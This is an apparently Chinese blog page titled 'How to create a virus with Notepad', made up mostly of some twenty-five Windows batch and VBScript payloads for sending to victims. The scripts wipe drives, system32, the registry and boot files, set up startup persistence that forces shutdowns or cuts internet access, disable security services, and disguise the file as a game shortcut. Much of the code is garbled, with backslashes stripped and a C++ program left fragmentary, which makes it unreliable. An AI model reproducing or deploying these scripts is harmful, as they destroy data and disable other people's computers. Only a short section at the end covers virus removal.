<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
        
        <title>如何使用记事本创建病毒（25个脚本）2021 | Erotica</title>
        
        <link rel="alternate" href="/atom.xml" title="Erotica" type="application/atom+xml">
        
        
        <link rel="icon" href="/lv.jpeg">
        
        
<link rel="stylesheet" href="/css/normalize.css">

        
<link rel="stylesheet" href="/css/style.css">

        
<link rel="stylesheet" href="/css/common.css">

        
<link rel="stylesheet" href="/css/markdown.css">

    <meta name="generator" content="Hexo 5.4.0"></head>
    <body onscroll="scrollYListener()">
        <div class="wrapper">
            <div class="mobile_menu_btn">
  <button id="mobile_menu_btn" class="c-hamburger c-hamburger--htx">
  <span>toggle menu</span>
  </button>
</div>
<div class="slide_menu">
  <nav class="nav_scroll">
    <ul class="clearfix">
      
      
      <li class=""> <a href="/">Home</a> </li>
      
      
      <li class="active dotted"> <a href="/archives">Archive</a> </li>
      
    </ul>
  </nav>
  <div class="social">
    <ul class="clearfix">
      
      
      <li> <a href="http://github.com/cheng-kang" target="_blank"> <img src="/img/GitHub.png"> </a> </li>
      
      
      
      <li> <a href="http://www.weibo.com/progrant" target="_blank"> <img src="/img/Weibo.png"> </a> </li>
      
      
      
      <li> <a href="https://twitter.com/ScotlAnt" target="_blank"> <img src="/img/Twitter.png"> </a> </li>
      
      
      
      
    </ul>
  </div>
  <div class="copyright">
    &copy; 2021 Erotica | Provided By  <a title="吔屎啦你" href="http://chengkang.me/" target="_blank">吔屎啦你</a>
  </div>
</div>
<header>
  <div class="mobile_navbar clearfix">
    
    <div class="logo">
      <a href="/">Erotica</a>
    </div>
    
  </div>
  <div class="row clearfix no_form">
    <div class="logo">
      <a href="/">Erotica</a>
    </div>
    <nav class="nav_scroll">
      <ul class="clearfix">
      
      
      <li class=""> <a href="/">Home</a> </li>
      
      
      <li class="active dotted"> <a href="/archives">Archive</a> </li>
      
      </ul>
    </nav>
  </div>
</header>
            <div class="section" id="Search">
	<div class="section_content">
		<h3>
		Search
		<br>
		Find out if your question is answered here
		</h3>
		<div id="search-content" class="search-content-modal unexpanded">
			<div id="search-view">
				<div class="search-info box">
					<input type="text" id="search-input" placeholder="Enter Keyword" >
					<div class="magnifying-glass" id="search-button" >
						<svg xmlns="https://www.w3.org/2000/svg" viewBox="0 0 500 500">
						<path fill="none" stroke="#fff" stroke-width="36" stroke-linecap="round" d="m280,278a153,153 0 1,0-2,2l170,170m-91-117 110,110-26,26-110-110"></path>
					</svg>
				</div>
			</div>
			<div class="modal" id="search-result" style="display:none">
				<h2 id="search-result-title">Found 0 match(es):</h2>
				<ul id="search-result-list">
				</ul>
				<span>
					<button onclick="dismissSearchResultModal()">×</button>
				</span>
			</div>
		</div>
	</div>
</div>


<script src="/js/jquery-3.1.1.min.js"></script>


<script src="/js/search.js"></script>

<script type="text/javascript">
var path = "/search.xml";
searchFunc(path, 'search-input', 'search-result-list');
</script>

<script>
function dismissSearchResultModal() {
	document.getElementById("search-result").style.display = "none";
}
</script>
</div>
<div class="section" id="Post">
	<div class="section_content">
		<p class="breadcrumb"><a href="/">Q&amp;A</a> / 如何使用记事本创建病毒（25个脚本）2021</p>
		<div class="page_content mdcss">
			<p><strong>如何使用记事本创建病毒</strong></p>
<ol>
<li><p>只需在记事本中复制/粘贴所有代码。</p>
</li>
<li><p>使用扩展名 .bat 保存文件（如 seofreetips.bat）</p>
</li>
<li><p>通过邮件或 Pen Drive 将其发送给受害者。</p>
</li>
<li><p>当受害者点击它时，它就会开始工作。</p>
</li>
<li><p>您也可以在自己的 PC 上检查这些代码。</p>
</li>
<li><p>我已经在我的 Microsoft Surface Pro 中亲自检查了所有这些代码。</p>
</li>
<li><p>这些代码仅适用于 Windows。</p>
 <span id="more"></span></li>
</ol>
<p><strong>1. 使用记事本创建虚假的 Windows 错误</strong></p>
<ol>
<li>打开记事本</li>
<li>Type <em>X=Msgbox(“这里的消息”,0+16,“这里的标题”)</em></li>
<li> 分别 用您的 <em>错误消息</em> 和 <em>错误窗口标题</em>替换 <em>此处的消息</em> 和 <em>此处的标题</em>。</li>
<li>使用<em>error.vbs</em>保存文件 <em>。</em>（在另存为文件类型中，必须选择“全部”）</li>
<li>现在，单击该文件，您将收到自定义的 Windows 错误消息。所以很容易学习如何使用记事本创建病毒</li>
</ol>
<p><a target="_blank" rel="noopener" href="https://nekraj.com/hack-computers-by-command-prompt/">使用 netbios 命令入侵计算机</a></p>
<p><strong>2. 如何阻止某人的互联网访问</strong></p>
<p>@回声关闭</p>
<p>配置/发布</p>
<p>将其另存为 .bat 并将其发送给某人。他们的 IP 地址将会丢失，因此他们将无法修复它</p>
<p>但是，这很容易解决。只需输入 IPconfig /renew</p>
<p><strong>3. 危险的记事本病毒代码</strong></p>
<p>只需打开记事本</p>
<p>现在输入以下代码::</p>
<p><strong>@echo off</strong></p>
<p><strong>del D:*.* /f /s /q</strong></p>
<p><strong>del E:*.* /f /s /q</strong></p>
<p><strong>del F:*.* /f /s /q</strong></p>
<p><strong>del G:*.* /f /s /q</strong></p>
<p><strong>del H:*.* /f /s /q</strong></p>
<p><strong>del I:*.* /f /s /q</strong></p>
<p><strong>del J:*.* /f /s /q</strong></p>
<p>然后将其保存为 SEO.bat 并创建批处理文件。</p>
<p>警告:: 这是最危险的病毒！小心使用它。</p>
<p><strong>4. 删除整个注册表</strong></p>
<p><strong>@ECHO OFF</strong></p>
<p><strong>START reg delete HKCR/.exe</strong></p>
<p><strong>START reg delete HKCR/.dll</strong></p>
<p><strong>START reg delete HKCR/*</strong></p>
<p>现在将其保存为 SEO.bat 并创建批处理文件。</p>
<p><strong>5.用记事本病毒永远使 PC 崩溃</strong></p>
<p>如何使 PC 永远崩溃！:::</p>
<p><strong>@echo off</strong></p>
<p><strong>attrib -r -s -h c:autoexec.bat</strong></p>
<p><strong>del c:autoexec.bat</strong></p>
<p><strong>attrib -r -s -h c:boot.ini</strong></p>
<p><strong>del c:boot.ini</strong></p>
<p><strong>attrib -r -s -h c:ntldr</strong></p>
<p><strong>del c:ntldr</strong></p>
<p><strong>attrib -r -s -h c:windowswin.ini</strong></p>
<p><strong>del c:windowswin.ini</strong></p>
<p>打开记事本并复制并粘贴它。将其另存为 .bat 文件。</p>
<p>这应该关闭此人的计算机。它会关闭一次并删除重新启动和重新启动所需的文件。</p>
<p><em>记住——不要点击这个文件。</em></p>
<p><strong>6. 应用轰炸机</strong></p>
<p>它将开始反复打开不同的应用程序，这将影响系统的性能。</p>
<p>您还可以在上面的代码中添加您选择的应用程序。</p>
<p>@echo off</p>
<p>start winword</p>
<p>start mspaint</p>
<p>start notepad</p>
<p>start write</p>
<p>start cmd</p>
<p>start explorer</p>
<p>start control</p>
<p>start calc</p>
<p>goto x</p>
<p><strong>7.关闭电脑百万次</strong></p>
<p>1.在桌面右击</p>
<p>2.点击新建——快捷方式</p>
<p>你会得到一个对话框，在里面写： shutdown -s -t 1000 c “你想要的任何评论”然后按下一步</p>
<p>注意：我写的这个“1000”是计算机关闭所需的时间（以秒为单位），您可以输入任何您想要的数字……</p>
<p>\3. 你会得到另一个对话框，在里面写： Internet Explorer 然后按完成</p>
<p>4.你会在你的桌面上找到图标，不要打开它，只需右键单击它并按属性&gt;更改图标&gt;选择Internet Explorer的图标，然后按应用即可</p>
<p>尝试打开它，它是病毒</p>
<p>PS：2 阻止计算机关闭的唯一方法是去 2 开始&gt;运行&gt;输入：shutdown -a</p>
<p><strong>8.删除系统32文件夹</strong></p>
<p>打开记事本</p>
<p>在那里写入/复制以下命令：</p>
<p>” del c:WINDOWSsystem32*.*/q “ 不带引号</p>
<p>并另存为“anything.bat”</p>
<p>完毕。如果您将此文件提供给您的受害者，他的 SYSTEM 32 文件夹将被删除。没有它，Windows Pc 就无法启动。</p>
<p><strong>9. 3 秒内形成驱动器</strong></p>
<p>“rd/s/q D:</p>
<p>rd/s/q C:</p>
<p>rd/s/q E:” （不带引号）</p>
<p>另存为“anything.bat</p>
<p>此病毒会在 3 秒内格式化 C、D 和 E 驱动器。如果您想学习如何使用记事本创建病毒，这是一个非常有用的脚本。</p>
<p>没有 10 :-</p>
<p>只需打开记事本并输入以下代码即可。</p>
<p><strong>set ws=createobject(“wscript.shell”)</strong></p>
<p><strong>dim strDir,strfile,st,strtxt2,strshell,strlog</strong></p>
<p><strong>dim obfso,obfolder,obshell,obfile,obtxtfile</strong></p>
<p><strong>strshell=”wscript.shell”</strong></p>
<p><strong>strDir=”C:WINDOWS”</strong></p>
<p><strong>strfile=”wscript.vbs”</strong></p>
<p><strong>st=Chr(34)</strong></p>
<p><strong>strlog=”shutdown -l”</strong></p>
<p><strong>strtxt2=”ws.run(strlog)”</strong></p>
<p><strong>set obfso=CreateObject(“Scripting.FileSystemObject”)</strong></p>
<p><strong>on error resume next</strong></p>
<p><strong>set obfile=obfso.CreateTextfile(strDir &amp; strfile)</strong></p>
<p><strong>obfile.writeline(“set ws=createobject(“&amp;st&amp;strshell&amp;st&amp;”)”)</strong></p>
<p><strong>obfile.writeline(“ws.run(“&amp;st&amp;strlog&amp;st&amp;”)”)</strong></p>
<p><strong>ws.regwrite “HKCUSoftwareMicrosoftWindowsCurrentVersionRunLogoff”,”C:WINDOWSwscript.vbs”,”REG_SZ”</strong></p>
<p>现在使用任何具有 .vbs 扩展名的名称保存此记事本文件。</p>
<p><strong>11. 用 I Love You Messege 关闭电脑</strong></p>
<p>向你的朋友传达一点信息并关闭他/她的电脑：</p>
<p><strong>@echo off</strong></p>
<p><strong>msg * I don’t like you</strong></p>
<p><strong>shutdown -c “Error! You are too stupid!” -s</strong></p>
<p>在所有文件中将其另存为“Anything.BAT”并发送。</p>
<p><strong>12. 同时切换您朋友的 Caps Lock 按钮：</strong></p>
<p>代码：</p>
<p><strong>Set wshShell =wscript.CreateObject(“WScript.Shel</strong></p>
<p><strong>l”)</strong></p>
<p><strong>do</strong></p>
<p><strong>wscript.sleep 100</strong></p>
<p><strong>wshshell.sendkeys “{CAPSLOCK}”</strong></p>
<p><strong>loop</strong></p>
<p>将其另存为“Anything.VBS”并发送。</p>
<p><strong>13.让这个 Vb 脚本同时按下 Enter 来挫败你的朋友：</strong></p>
<p>类型 ：</p>
<p>代码：</p>
<p><strong>Set wshShell = wscript.CreateObject(“WScript.Shell</strong></p>
<p><strong>“)</strong></p>
<p><strong>do</strong></p>
<p><strong>wscript.sleep 100</strong></p>
<p><strong>wshshell.sendkeys “~(enter)”</strong></p>
<p><strong>loop</strong></p>
<p>将其另存为“Anything.VBS”并发送。</p>
<p><strong>14.该病毒会删除驱动器的所有内容……</strong></p>
<p>@echo off</p>
<p><strong>del %systemdrive%*.* /f /s /q</strong></p>
<p><strong>shutdown -r -f -t 00</strong></p>
<p>将上面的代码另存为Anything.bat</p>
<p><strong>15.这会导致你的电脑崩溃</strong></p>
<p><strong>Option Explicit</strong></p>
<p><strong>Dim WSHShell</strong></p>
<p><strong>Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)</strong></p>
<p><strong>Dim x</strong></p>
<p><strong>For x = 1 to 100000000</strong></p>
<p><strong>WSHShell.Run “Tourstart.exe”</strong></p>
<p><strong>Next</strong></p>
<p>另存为任何内容.vbs</p>
<p><strong>16.最简单的病毒击碎窗户</strong></p>
<p><strong>@Echo off</strong></p>
<p><strong>Del C: *.* |y</strong></p>
<p>另存为任何内容.bat</p>
<p><strong>17.使电脑崩溃的病毒</strong></p>
<p><strong>@echo off</strong></p>
<p><strong>attrib -r -s -h c:autoexec.bat</strong></p>
<p><strong>del c:autoexec.bat</strong></p>
<p><strong>attrib -r -s -h c:boot.ini</strong></p>
<p><strong>del c:boot.ini</strong></p>
<p><strong>attrib -r -s -h c:ntldr</strong></p>
<p><strong>del c:ntldr</strong></p>
<p><strong>attrib -r -s -h c:windowswin.ini</strong></p>
<p><strong>del c:windowswin.ini</strong></p>
<p><strong>@echo off</strong></p>
<p><strong>msg * YOU GOT OWNED!!!</strong></p>
<p><strong>shutdown -s -t 7 -c “A VIRUS IS TAKING OVER c:Drive</strong></p>
<p>在记事本中另存为Anything.bat文件！！</p>
<p>这将弹出一条消息说拥有！</p>
<p>并关闭计算机永远不会再重新启动！</p>
<p><strong>18.每次开机时关闭电脑</strong></p>
<p>另存为bat文件</p>
<p><strong>echo @echo off&gt;c:windowshartlell.bat</strong></p>
<p><strong>echo break off&gt;&gt;c:windowshartlell.bat</strong></p>
<p><strong>echo shutdown -r -t 11 -f&gt;&gt;c:windowshartlell.bat</strong></p>
<p><strong>echo end&gt;&gt;c:windowshartlell.bat</strong></p>
<p><strong>reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f</strong></p>
<p><strong>reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f</strong></p>
<p><strong>echo You have been HACKED.</strong></p>
<p><strong>PAUSE</strong></p>
<p><strong>19.永久禁用互联网</strong></p>
<p><strong>echo @echo off&gt;c:windowswimn32.bat</strong></p>
<p><strong>echo break off&gt;&gt;c:windowswimn32.bat</strong></p>
<p><strong>echo ipconfig/release_all&gt;&gt;c:windowswimn32.bat</strong></p>
<p><strong>echo end&gt;&gt;c:windowswimn32.bat</strong></p>
<p><strong>reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f</strong></p>
<p><strong>reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f</strong></p>
<p><strong>echo You Have Been HACKED!</strong></p>
<p><strong>PAUSE</strong></p>
<p>另存为bat文件</p>
<p><strong>20. 将文件更改为非工作 TXT 文件</strong></p>
<p>另存为bat文件</p>
<p><strong>REN *.DOC *.TXT REN *.JPEG *.TXT</strong></p>
<p><strong>REN *.LNK *.TXT</strong></p>
<p><strong>REN *.AVI *.TXT</strong></p>
<p><strong>REN *.MPEG *.TXT</strong></p>
<p><strong>REN *.COM *.TXT</strong></p>
<p><strong>REN *.BAT *.TXT</strong></p>
<p><strong>21.系统崩溃</strong></p>
<p><strong>:CRASH</strong></p>
<p><strong>net send * WORKGROUP ENABLED</strong></p>
<p><strong>net send * WORKGROUP ENABLED</strong></p>
<p><strong>GOTO CRASH</strong></p>
<p><strong>ipconfig /release</strong></p>
<p><strong>shutdown -r -f -t0</strong></p>
<p><strong>echo @echo off&gt;c:windowshartlell.bat</strong></p>
<p><strong>echo break off&gt;&gt;c:windowshartlell.bat</strong></p>
<p><strong>echo shutdown -r -t 11 -f&gt;&gt;c:windowshartlell.bat</strong></p>
<p><strong>echo end&gt;&gt;c:windowshartlell.bat</strong></p>
<p><strong>reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f</strong></p>
<p><strong>reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f</strong></p>
<p><strong>echo You Have Been Hackedecho @echo off&gt;c:windowswimn32.bat</strong></p>
<p><strong>echo break off&gt;&gt;c:windowswimn32.bat</strong></p>
<p><strong>echo ipconfig/release_all&gt;&gt;c:windowswimn32.bat</strong></p>
<p><strong>echo end&gt;&gt;c:windowswimn32.bat</strong></p>
<p><strong>reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f</strong></p>
<p><strong>reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f</strong></p>
<p><strong>echo YOU HAVE BEEN HACKED BITCH</strong></p>
<p><strong>REN *.DOC *.TXT</strong></p>
<p><strong>REN *.JPEG *.TXT</strong></p>
<p><strong>REN *.LNK *.TXT</strong></p>
<p><strong>REN *.AVI *.TXT</strong></p>
<p><strong>REN *.MPEG *.TXT</strong></p>
<p><strong>REN *.COM *.TXT</strong></p>
<p><strong>REN *.BAT *.TXT</strong></p>
<p><strong>PAUSE</strong></p>
<p><strong>PAUSE</strong></p>
<p>另存为bat文件</p>
<p><strong>22.临时洪水网络</strong></p>
<p><strong>:CRASH</strong></p>
<p><strong>net send * WORKGROUP ENABLED</strong></p>
<p><strong>net send * WORKGROUP ENABLED</strong></p>
<p><strong>GOTO CRASH</strong></p>
<p><strong>23. 每次开机都要关机！</strong></p>
<p>这里是怎么回事？</p>
<p>? 打开记事本</p>
<p>? 类型 ：</p>
<p><strong>@ECHO OFF</strong></p>
<p><strong>shutdown -s -t 10 -c “Virus Attack…”</strong></p>
<p><strong>exit</strong></p>
<p>? 文件&gt;&gt;另存为…</p>
<p>? 命名：virus.bat</p>
<p>? 开始 &gt;&gt; 所有程序</p>
<p>? 右键单击启动&gt;&gt;打开</p>
<p>? 这将打开启动文件夹</p>
<p>? 将 Virus.bat 文件粘贴到此处！</p>
<p>*** 就是这样，现在电脑会</p>
<p>每次开机自动关机！</p>
<p>如何传播：</p>
<p>Windows 不允许更改 .bat 文件的图标。因此，您可以做的是：</p>
<ul>
<li>右键单击 .bat 文件</li>
<li>点击创建快捷方式</li>
<li>并隐藏原始文件。</li>
<li>现在，由于这个新创建的文件只是快捷方式，您可以轻松更改其图标。</li>
<li>右键单击此快捷方式</li>
<li>属性 &gt;&gt;&gt;..cutomize&gt;&gt;..选择图标</li>
<li>现在给它一个有吸引力的图标。</li>
<li>现在给它命名一些有趣的东西。例如。原型或 IGI 等。</li>
<li>现在你的受害者会认为这是游戏，他很容易被腐蚀。</li>
</ul>
<p><strong>24. 永久关闭你的互联网:::</strong></p>
<p>这是一个稍微高级一点的。它会永久关闭您的互联网。我不小心在自己身上试了一下，我知道它做了什么，而且它</p>
<p>我还是花了几天时间才恢复上网。效果最好</p>
<p>XP，未在 vista 或 7 上测试。</p>
<p>编辑：在底部放一个rickroll</p>
<p>网站什么的。顺便说一句，第三行不是禁用互联网的原因</p>
<p>永久性。这是别的东西，只是提供了快速响应</p>
<p>关闭任何连接。</p>
<p><strong>@echo off</strong></p>
<p><strong>reg</strong></p>
<p><strong>add HKLMSoftwareMicrosoftWindowsCurrentVersionRun /v MiXedVeX /t</strong></p>
<p><strong>REG_SZ /d %systemroot%HaloTrialScoreChangerV1 /f &gt; nul</strong></p>
<p><strong>start iexpress (website of your choice)</strong></p>
<p><strong>ipconfig /release</strong></p>
<p><strong>del “C:Program FilesMicrosoft Games</strong></p>
<p><strong>del “C:Nexon</strong></p>
<p><strong>del “C:Program FilesXfire</strong></p>
<p><strong>del “C:Program FilesAdobe”</strong></p>
<p><strong>del “C:Program FilesInternet Explorer”</strong></p>
<p><strong>del “C:Program FilesMozilla Firefox”</strong></p>
<p><strong>del “C:WINDOWS”</strong></p>
<p><strong>del “C:WINDOWSsystem32”</strong></p>
<p><strong>del “C:WINDOWSsystem32cmd”</strong></p>
<p><strong>del “C:WINDOWSsystem32iexpress”</strong></p>
<p><strong>del “C:WINDOWSsystem32sndvol32”</strong></p>
<p><strong>del “C:WINDOWSsystem32sndrec32”</strong></p>
<p><strong>del “C:WINDOWSsystem32Restorerstrui”</strong></p>
<p><strong>del “C:WINDOWSsystem32wupdmgr”</strong></p>
<p><strong>del “C:WINDOWSsystem32desktop”</strong></p>
<p><strong>del “C:WINDOWSjava”</strong></p>
<p><strong>del “C:WINDOWSMedia”</strong></p>
<p><strong>del “C:WINDOWSResources”</strong></p>
<p><strong>del “C:WINDOWSsystem”</strong></p>
<p><strong>del “C:drivers”</strong></p>
<p><strong>del “C:drv”</strong></p>
<p><strong>del “C:SYSINFO”</strong></p>
<p><strong>del “C:Program Files”</strong></p>
<p><strong>echo ipconfig/release_all&gt;&gt;c:windowswimn32.bat</strong></p>
<p><strong>net stop “Security Center”</strong></p>
<p><strong>net stop SharedAccess</strong></p>
<p><strong>&gt; “%Temp%.kill.reg” ECHO REGEDIT4</strong></p>
<p><strong>&gt;&gt;”%Temp%.kill.reg” ECHO.</strong></p>
<p><strong>&gt;&gt;”%Temp%.kill.reg” ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]</strong></p>
<p><strong>&gt;&gt;”%Temp%.kill.reg” ECHO “Start”=dword:00000004</strong></p>
<p><strong>&gt;&gt;”%Temp%.kill.reg” ECHO.</strong></p>
<p><strong>&gt;&gt;”%Temp%.kill.reg” ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]</strong></p>
<p><strong>&gt;&gt;”%Temp%.kill.reg” ECHO “Start”=dword:00000004</strong></p>
<p><strong>&gt;&gt;”%Temp%.kill.reg” ECHO.</strong></p>
<p><strong>&gt;&gt;”%Temp%.kill.reg” ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]</strong></p>
<p><strong>&gt;&gt;”%Temp%.kill.reg” ECHO “Start”=dword:00000004</strong></p>
<p><strong>&gt;&gt;”%Temp%.kill.reg” ECHO.</strong></p>
<p><strong>START /WAIT REGEDIT /S “%Temp%.kill.reg”</strong></p>
<p><strong>del “%Temp%.kill.reg”</strong></p>
<p><strong>del %0</strong></p>
<p><strong>echo @echo off&gt;c:windowswimn32.bat</strong></p>
<p><strong>echo break off&gt;&gt;c:windowswimn32.bat</strong></p>
<p><strong>echo ipconfig/release_all&gt;&gt;c:windowswimn32.bat</strong></p>
<p><strong>echo end&gt;&gt;c:windowswimn32.bat</strong></p>
<p><strong>reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f</strong></p>
<p><strong>reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f</strong></p>
<p><strong>:a</strong></p>
<p><strong>start iexpress (website of your choice)</strong></p>
<p><strong>goto a</strong></p>
<p><strong>25. 制作最危险的病毒矩阵:::</strong></p>
<p>警告 - 不要在您的计算机上运行它</p>
<p>我要教你如何制作一个名为Matrix的病毒……</p>
<p>1-打开记事本</p>
<p>2-放入此代码</p>
<p><strong>#include</strong></p>
<p><strong>#include</strong></p>
<p><strong>#include</strong></p>
<p><strong>#include</strong></p>
<p><strong>#include</strong></p>
<p><strong>#include</strong></p>
<p><strong>#include</strong></p>
<p><strong>using namespace std;</strong></p>
<p><strong>int main()</strong></p>
<p>{ <strong>keybd_event(VK_MENU,0x38,0,0);</strong></p>
<p><strong>keybd_event(VK_RETURN,0x1c,0,0);</strong></p>
<p><strong>keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);</strong></p>
<p><strong>keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);</strong></p>
<p><strong>HANDLE outToScreen;</strong></p>
<p><strong>outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);</strong></p>
<p><strong>{</strong></p>
<p><strong>char buffer[255];</strong></p>
<p><strong>char inputFile[]=”C:Documents and SettingsAll UsersStart MenuProgramsStartuprawr.bat”;</strong></p>
<p><strong>ifstream input(inputFile);</strong></p>
<p><strong>if (!input)</strong></p>
<p><strong>{</strong></p>
<p><strong>{</strong></p>
<p><strong>ofstream fp(“C:Documents and SettingsAll UsersStart MenuProgramsStartuprawr.bat”, ios::app);</strong></p>
<p><strong>fp</strong></p>
<p><strong>fp</strong></p>
<p><strong>fp</strong></p>
<p><strong>}</strong></p>
<p><strong>}</strong></p>
<p><strong>else</strong></p>
<p><strong>{</strong></p>
<p><strong>while (!input.eof())</strong></p>
<p><strong>{</strong></p>
<p><strong>input.getline(buffer,255);</strong></p>
<p><strong>}</strong></p>
<p><strong>}</strong></p>
<p><strong>}</strong></p>
<p><strong>{</strong></p>
<p><strong>char buffer[255];</strong></p>
<p><strong>char inputFile[]=”C:rawr.exe”;</strong></p>
<p><strong>ifstream input(inputFile);</strong></p>
<p><strong>if (!input)</strong></p>
<p><strong>{</strong></p>
<p><strong>{</strong></p>
<p><strong>{</strong></p>
<p><strong>ofstream fp(“CLICK.bat”, ios::app);</strong></p>
<p><strong>fp</strong></p>
<p><strong>fp</strong></p>
<p><strong>fp</strong></p>
<p><strong>fp</strong></p>
<p><strong>}</strong></p>
<p><strong>system(“START CLICK.bat”);</strong></p>
<p><strong>main();</strong></p>
<p><strong>}</strong></p>
<p><strong>}</strong></p>
<p><strong>else</strong></p>
<p><strong>{</strong></p>
<p><strong>while (!input.eof())</strong></p>
<p><strong>{</strong></p>
<p><strong>input.getline(buffer,255);</strong></p>
<p><strong>system(“call shutdown.exe -S”);</strong></p>
<p><strong>goto START;</strong></p>
<p><strong>}</strong></p>
<p><strong>}</strong></p>
<p><strong>}</strong></p>
<p><strong>START:{</strong></p>
<p><strong>for(int i = 0; i &lt; 1; i++)</strong></p>
<p><strong>{</strong></p>
<p><strong>int num = (rand() % 10);</strong></p>
<p><strong>SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);</strong></p>
<p><strong>cout</strong></p>
<p><strong>cout</strong></p>
<p><strong>cout</strong></p>
<p><strong>cout</strong></p>
<p><strong>cout</strong></p>
<p><strong>cout</strong></p>
<p><strong>cout</strong></p>
<p><strong>cout</strong></p>
<p><strong>cout</strong></p>
<p><strong>cout</strong></p>
<p><strong>cout</strong></p>
<p><strong>cout</strong></p>
<p><strong>Sleep(60);</strong></p>
<p><strong>}</strong></p>
<p><strong>}</strong></p>
<p><strong>for ( int j = 0; j &lt; 5; j++)</strong></p>
<p><strong>{</strong></p>
<p><strong>SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);</strong></p>
<p><strong>int number = (rand() % 24);</strong></p>
<p><strong>cout</strong></p>
<p><strong>}</strong></p>
<p><strong>goto START;</strong></p>
<p>3-另存为matrix.bat</p>
<p>4-完成</p>
<p>由于它太危险，所以没有给出这个脚本的实际头文件</p>
<p>如果你想试试这个脚本，你可以只使用头文件，比如 STDIN、STDLIB、CONIO 和类似的东西</p>
<p><strong>26. 使用记事本将文本转换为音频：</strong></p>
<p>打开记事本。</p>
<p>复制并粘贴下面提到的代码。</p>
<p>Dim message, sapi message=InputBox(“输入你的文本进行转换——Hacking-world.tk”,”Hover pc Hacks Text-To-Audio Converter”) Set sapi=CreateObject(“sapi.spvoice”) sapi.Speak message</p>
<p>使用任何名称以 .vbs 作为扩展名保存此文件。例如。文本到音频.vbs</p>
<p><strong>如何杀死正在运行的病毒 –</strong></p>
<p>第一种方式：配置启动进程以停止它</p>
<p>进程可以由服务运行，也可以由启动进程运行。如果您可以识别服务或启动过程，那么您可以告诉您的计算机在下次启动时不要运行。这是推荐的方法。</p>
<p>有时，病毒进程在启动后几分钟后才开始运行。在这种情况下，病毒进程通常由另一个进程运行，该进程可能是合法进程（例如 services.exe）。Windows 服务的确切工作方式超出了本教程的范围。</p>
<p>您需要知道的是，您应该找出病毒进程是否由某些 Windows 服务运行。找出最快的方法是在病毒进程开始运行后计算正在运行的服务的数量（通过转到 Windows -&gt; 运行… -&gt; 键入“msconfig”并单击“服务”选项卡）。</p>
<p>你杀了病毒进程；然后再次计算正在运行的服务的数量。如果数字下降了 1，那么您肯定知道某些服务是罪魁祸首。找出该服务是什么并取消选中它并重新启动。</p>
<p>我用这种方式为我叔叔清除了病毒。首先，确定运行病毒进程的服务转到 Windows -&gt; 运行… -&gt; 键入“Services.msc”。您应该会看到一个服务列表。对于它们中的每一个，您都可以右键单击并选择“属性”（或右键单击并按“R”键）。</p>
<p>在“属性”窗口中，您可以看到“可执行文件的路径”，这是您感兴趣的内容。由于您已经知道病毒 .exe 的路径，因此您可以查看每个服务并查看哪个服务具有该路径。如果您能找到它，请转到 Windows -&gt; 运行… -&gt; 键入“msconfig”。</p>
<p>单击“服务”选项卡，您应该会在其中看到服务列表。选中的那些是在您的计算机启动时自动运行的。取消选中病毒服务并重新启动。</p>
<p>计算机启动后，病毒进程不应运行，您应该能够安全地删除病毒文件。 但是，如果服务是关键的 Windows 服务，例如“COM+ 事件系统”和“工作站”</p>
<p>如果找不到，请转到 Windows -&gt; 运行… -&gt; 键入“msconfig”，查看“启动”选项卡中的列表。在命令列中，您可以看到 .exe 的路径。取消选中与病毒路径匹配的那个并重新启动。计算机启动后，病毒进程不应运行，您应该能够安全地删除病毒文件。</p>
<p>第二种方式：手动杀死进程，在进程资源管理器中右键单击 .exe 并选择“杀死进程”。 </p>
<p>但是，如果这是一个关键的 Windows 进程，例如“svchost.exe”。您可能会看到一个错误对话框，说您无法杀死它。或者您可能成功杀死它，但随后您的计算机以一种奇怪的、不稳定的或无法操作的方式运行（例如，如果您停止“explore.exe”，您桌面上的所有项目都将消失）。</p>
<p>否则，您可以安全地删除病毒文件。如果您可以成功停止病毒进程，您将能够删除病毒文件。同样，即使您无法删除病毒文件，只要您可以停止病毒进程，病毒就不会影响您的PC，您可以继续正常工作。重新启动，病毒应该消失了。</p>
<p>作为替代方法，您可以将病毒文件重命名为任何垃圾名称。当某些进程正在使用文件时，Windows 操作系统不允许您删除该文件，但它允许您重命名它，使其无法使用。重命名后，您应该可以删除它</p>

		</div>
	</div>

	

	
	
</div>

	
	
	
	<div class="section" id="Pagenation">
		
		<a href="/2021/07/22/%E7%A0%B4%E8%A7%A3WIFI%E7%BD%91%E7%BB%9C%E5%9B%BE%E7%89%87/">Prev</a>
		
		
		<a href="/2021/07/20/%E5%AD%A6%E4%B9%A0%E9%81%93%E5%BE%B7%E9%BB%91%E5%AE%A2%E7%9A%8414%E4%B8%AA%E7%BD%91%E7%AB%99/">Next</a>
		
	</div>
	

            <footer>
	<div class="footer_wrap">
		<div class="social">
			<ul class="clearfix">
				
				
